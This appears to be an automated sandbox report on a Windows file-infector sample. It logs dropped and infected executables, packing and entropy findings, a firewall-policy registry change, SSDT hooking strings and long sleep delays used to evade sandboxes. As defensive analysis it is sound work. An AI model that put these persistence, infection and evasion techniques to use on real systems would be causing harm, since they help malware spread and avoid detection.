        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: profapi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: languageoverlayutil.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47mrm.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textshaping.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: rmclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uiamanager.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.immersive.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dataexchange.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.fontgroups.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: fontgroupsoverride.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: directmanipulation.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: notificationcontrollerps.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: powrprof.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: umpdc.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.controls.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.applicationmodel.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.graphics.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: audioses.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mmdevapi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: devobj.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: usermgrproxy.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: avrt.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: userenv.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: sspicli.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.web.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: logoncli.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: threadpoolwinrt.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: structuredquery.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.search.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
        Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dll
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4657278A-411B-11d2-839A-00C04FD918D0}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic file information: File size 1233920 > 1048576
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdb source: msedge.exe.6.dr
        Source: Binary string: y.pdb source: SearchApp.exe, 0000001F.00000000.1605415996.000001D62E0C2000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdbOGP source: msedge.exe.6.dr

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeUnpacked PE file: 9.2.YMZwp.exe.b30000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B220 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,UnRegisterTypeLib,6_2_0042B220
        Source: initial sampleStatic PE information: section where entry point is pointing to: cu
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic PE information: section name: cu
        Source: YMZwp.exe.6.drStatic PE information: section name: .aspack
        Source: YMZwp.exe.6.drStatic PE information: section name: .adata
        Source: msedge.exe.6.drStatic PE information: section name: .00cfg
        Source: msedge.exe.6.drStatic PE information: section name: .gxfg
        Source: msedge.exe.6.drStatic PE information: section name: .retplne
        Source: msedge.exe.6.drStatic PE information: section name: CPADinfo
        Source: msedge.exe.6.drStatic PE information: section name: LZMADEC
        Source: msedge.exe.6.drStatic PE information: section name: _RDATA
        Source: msedge.exe.6.drStatic PE information: section name: malloc_h
        Source: MyProg.exe.9.drStatic PE information: section name: PELIB
        Source: MyProg.exe.9.drStatic PE information: section name: Y|uR
        Source: SciTE.exe.9.drStatic PE information: section name: u
        Source: Uninstall.exe.9.drStatic PE information: section name: EpNuZ
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004AB680 push eax; ret 6_2_004AB6AE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004ADD18 push eax; ret 6_2_004ADD36
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_02433600 push eax; ret 6_2_0243362E
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242072E push eax; iretd 6_2_0242072F
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B31638 push dword ptr [00B33084h]; ret 9_2_00B3170E
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B36014 push 00B314E1h; ret 9_2_00B36425
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B32D9B push ecx; ret 9_2_00B32DAB
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B3600A push ebp; ret 9_2_00B3600D
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic PE information: section name: .rsrc entropy: 7.708524676179253
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeStatic PE information: section name: cu entropy: 7.774178931521131
        Source: lwkdr.exe.6.drStatic PE information: section name: .text entropy: 7.989262346851243
        Source: YMZwp.exe.6.drStatic PE information: section name: .text entropy: 7.81169422100848
        Source: winxmkqo.exe.6.drStatic PE information: section name: .text entropy: 7.989262346851243
        Source: MyProg.exe.9.drStatic PE information: section name: Y|uR entropy: 6.9349017570106675
        Source: SciTE.exe.9.drStatic PE information: section name: u entropy: 6.934592345984145
        Source: Uninstall.exe.9.drStatic PE information: section name: EpNuZ entropy: 6.934553645927102
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Infects executable files (exe, dll, sys, html)
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\Users\user\AppData\Local\Temp\winxmkqo.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\lwkdr.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\Users\user\AppData\Local\Temp\YMZwp.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        May modify the system service descriptor table (often done to hook functions)
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004292C0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus,6_2_004292C0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042E740 DestroyCursor,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu,6_2_0042E740
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00432B10 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow,6_2_00432B10
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004A9CB0 IsIconic,GetWindowPlacement,GetWindowRect,6_2_004A9CB0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042EE10 IsIconic,6_2_0042EE10
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: SearchApp.exe, 0000001F.00000000.1628661108.000001D6328A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
        Source: SearchApp.exe, 0000001F.00000000.1628661108.000001D6328A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\UNITY\EDITOR\UNITY.EXE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2100000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeWindow / User API: threadDelayed 1401Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeWindow / User API: threadDelayed 4895Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeWindow / User API: foregroundWindowGot 573Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeWindow / User API: foregroundWindowGot 575Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869
        Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 9994
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winxmkqo.exeJump to dropped file
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeDropped PE file which has not been started: C:\lwkdr.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-1049
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-41841
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7304Thread sleep time: -717312s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7376Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7384Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7408Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7624Thread sleep time: -440000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7400Thread sleep time: -80000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7608Thread sleep time: -220000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7608Thread sleep time: -49000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7612Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7612Thread sleep time: -360000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7384Thread sleep time: -18900000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7408Thread sleep time: -31200000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7380Thread sleep time: -1800000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7388Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7372Thread sleep time: -194560s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7632Thread sleep time: -210000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 7304Thread sleep time: -2506240s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 1624Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe TID: 2000Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1072Thread sleep count: 9994 > 30
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1072Thread sleep time: -99940000s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 1912Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B31754h9_2_00B31718
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B020 FindNextFileA,FindClose,FindFirstFileA,FindClose,6_2_0042B020
